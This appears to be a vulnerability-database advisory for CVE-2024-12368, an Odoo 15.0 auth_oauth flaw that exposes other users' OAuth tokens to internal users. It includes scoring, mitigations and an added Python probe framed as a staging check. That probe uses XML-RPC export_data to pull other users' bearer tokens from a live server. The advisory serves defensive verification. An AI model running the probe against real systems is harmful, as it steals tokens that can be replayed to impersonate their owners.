
CVE-2024-12368

Severity: High
Public PoC: referenced
Published: 25 February 2025
Modified: 28 February 2025
KEV Added: not listed
Patch: (no entry)
CVSS Score (v3.1): 8.1 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N)
EPSS Score: 0.0006 (19.9th percentile)
Risk Priority: 16 (weighted 60% EPSS, 20% KEV, 20% CVSS)

Summary

CVE-2024-12368 is a high-severity Improper Access Control (CWE-284) vulnerability in Odoo 15.0 (vendor: Odoo, product: Odoo). Its CVSS v3.1 base score is 8.1 (High).

Operationally, exploitation aligns with the MITRE ATT&CK technique Steal Application Access Token (T1528). Its EPSS score places it at the 19.9th percentile for exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog; and a public proof of concept is referenced.

The strongest mitigations our analysis identified are NIST 800-53 AC-3 (Access Enforcement) and AC-6 (Least Privilege).

Deeper analysis

CVE-2024-12368 is an improper access control vulnerability (CWE-284) in the auth_oauth module of Odoo Community 15.0 and Odoo Enterprise 15.0. Published on 2025-02-25, it enables an internal user to export OAuth tokens belonging to other users, earning a CVSS v3.1 base score of 8.1 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N).

The vulnerability can be exploited over the network by an authenticated internal user with low privileges; it requires low attack complexity and no user interaction. Successful exploitation lets the attacker export the OAuth tokens of other users, compromising confidentiality and integrity by granting unauthorized access to the external services or resources linked through those tokens. Because these are bearer tokens, an exported token stays usable against the linked provider until it expires or is revoked there, so response should include revoking affected users' tokens at the provider as well as applying the fix.

Mitigation details and patches are discussed in the Odoo GitHub issue at https://github.com/odoo/odoo/issues/193854.
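As an added example, not code from this page or from the Odoo project: a probe that runs the export check the advisory describes from the position of a low-privileged internal user, through Odoo's standard XML-RPC API, so an administrator can confirm on a staging copy whether the deployed 15.0 instance still exposes other users' tokens. It assumes the token lives in a res.users field named oauth_access_token (the name the auth_oauth module uses; verify it on your own install), and the FakeOdoo class with its user records and tokens is constructed here only so the script runs offline; make_rpc wires the same probe to a live server.

```python
import xmlrpc.client
from typing import Any, Callable

# Signature of a bound RPC call: (model, method, positional args, keyword args).
# It matches models.execute_kw(db, uid, password, model, method, args, kwargs)
# once db, uid and password have been bound, so the probe can run against a
# live server or against the constructed stand-in below.
ExecuteKw = Callable[[str, str, list, dict], Any]

# Assumption: the auth_oauth module keeps the provider token on res.users in a
# field named oauth_access_token. Confirm the name on your own install first.
TOKEN_FIELD = "oauth_access_token"


def make_rpc(url: str, db: str, login: str, password: str) -> tuple[int, ExecuteKw]:
    """Authenticate to a live Odoo over XML-RPC and return (uid, execute_kw).
    Only needed for a real run; the offline simulation never calls it."""
    common = xmlrpc.client.ServerProxy(f"{url}/xmlrpc/2/common")
    uid = common.authenticate(db, login, password, {})
    if not uid:
        raise SystemExit("authentication failed")
    models = xmlrpc.client.ServerProxy(f"{url}/xmlrpc/2/object")

    def execute_kw(model: str, method: str, args: list, kwargs: dict) -> Any:
        return models.execute_kw(db, uid, password, model, method, args, kwargs)

    return uid, execute_kw


def probe_token_export(execute_kw: ExecuteKw, uid: int) -> dict[str, str]:
    """Return {login: token} for every OTHER user whose OAuth token the calling
    user can pull out via export_data, the ORM method behind the web client's
    export dialog. An empty result means the server withheld the field."""
    # A field whose groups= restriction the caller does not meet is left out of
    # fields_get(), so its absence already means it cannot be exported.
    visible = execute_kw("res.users", "fields_get", [], {"attributes": ["string"]})
    if TOKEN_FIELD not in visible:
        return {}
    others = execute_kw("res.users", "search", [[["id", "!=", uid]]], {})
    if not others:
        return {}
    try:
        result = execute_kw("res.users", "export_data", [others, ["login", TOKEN_FIELD]], {})
    except xmlrpc.client.Fault:
        # A server-side AccessError reaches an XML-RPC client as a Fault.
        return {}
    # Char fields export one row per record, columns in the order requested.
    return {login: token for login, token in result["datas"] if token}


class FakeOdoo:
    """Constructed in-memory stand-in for the object endpoint: just enough of
    res.users to run the probe offline. mode is one of
      "leaky"  - field visible and exportable (the behaviour the CVE describes)
      "hidden" - field withheld from fields_get() for this user
      "denied" - field visible, but export raises AccessError"""

    USERS = [  # constructed sample records and tokens, not real credentials
        {"id": 2, "login": "admin", TOKEN_FIELD: "tok-admin-0001"},
        {"id": 7, "login": "alice", TOKEN_FIELD: "tok-alice-0002"},
        {"id": 9, "login": "bob", TOKEN_FIELD: ""},  # never logged in via OAuth
    ]

    def __init__(self, mode: str) -> None:
        self.mode = mode

    def execute_kw(self, model: str, method: str, args: list, kwargs: dict) -> Any:
        assert model == "res.users"
        if method == "fields_get":
            names = ["id", "login", TOKEN_FIELD]
            if self.mode == "hidden":
                names.remove(TOKEN_FIELD)
            return {name: {"string": name} for name in names}
        if method == "search":
            (domain,) = args
            field, op, value = domain[0]
            assert (field, op) == ("id", "!=")
            return [u["id"] for u in self.USERS if u["id"] != value]
        if method == "export_data":
            ids, fields = args
            if self.mode == "denied" and TOKEN_FIELD in fields:
                raise xmlrpc.client.Fault(1, "AccessError: res.users.oauth_access_token")
            rows = [[str(u[f]) for f in fields] for u in self.USERS if u["id"] in ids]
            return {"datas": rows}
        raise NotImplementedError(method)


if __name__ == "__main__":
    # Run the probe as alice (uid 7) against each simulated server behaviour.
    for mode in ("leaky", "hidden", "denied"):
        print(f"{mode:6s} -> {probe_token_export(FakeOdoo(mode).execute_kw, uid=7)}")
```

For a real run, create a fresh account that is only in the internal user group, call make_rpc with it, and pass the returned pair to probe_token_export; the check is read-only. A non-empty result reproduces the issue; the "hidden" and "denied" outcomes are the two shapes a fixed server can take, since either the field is withheld from fields_get for non-admin users or the export is refused with an AccessError.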


Vulnerability details

Improper access control in the auth_oauth module of Odoo Community 15.0 and Odoo Enterprise 15.0 allows an internal user to export the OAuth tokens of other users.

CWE(s)

CWE-284 Improper Access Control

Related Threats

MITRE ATT&CK Enterprise Techniques

T1528 Steal Application Access Token (Credential Access)
Adversaries can steal application access tokens as a means of acquiring credentials to access remote systems and resources.
Why these techniques?

The vulnerability lets an authenticated internal user export other users' OAuth tokens through the export feature because access control is not enforced on that field. That is the theft of application access tokens T1528 describes: a stolen token can be replayed against the linked service as its owner, and where the owner is more privileged than the attacker this also amounts to privilege escalation.

CVEs Like This One

CVE-2024-36259 (same product: Odoo)
CVE-2024-35177 (shared CWE-284)
CVE-2026-48898 (shared CWE-284)
CVE-2025-29315 (shared CWE-284)
CVE-2025-55261 (shared CWE-284)
CVE-2026-39339 (shared CWE-284)
CVE-2026-28855 (shared CWE-284)
CVE-2026-46839 (shared CWE-284)
CVE-2025-27646 (shared CWE-284)
CVE-2026-25519 (shared CWE-284)

Affected Assets

Vendor: odoo
Product: odoo
Version: 15.0

Mitigating Controls (NIST 800-53 r5)

AC-3 Access Enforcement (prevent): directly enforces approved authorizations for access to system resources such as OAuth tokens, preventing internal users from exporting tokens that belong to other users.

AC-6 Least Privilege (prevent): restricts low-privilege internal users from accessing or exporting other users' OAuth tokens.

Authenticator protection (prevent): requires authenticators, OAuth tokens included, to be protected from unauthorized disclosure, which the improper access allowing their export violates.
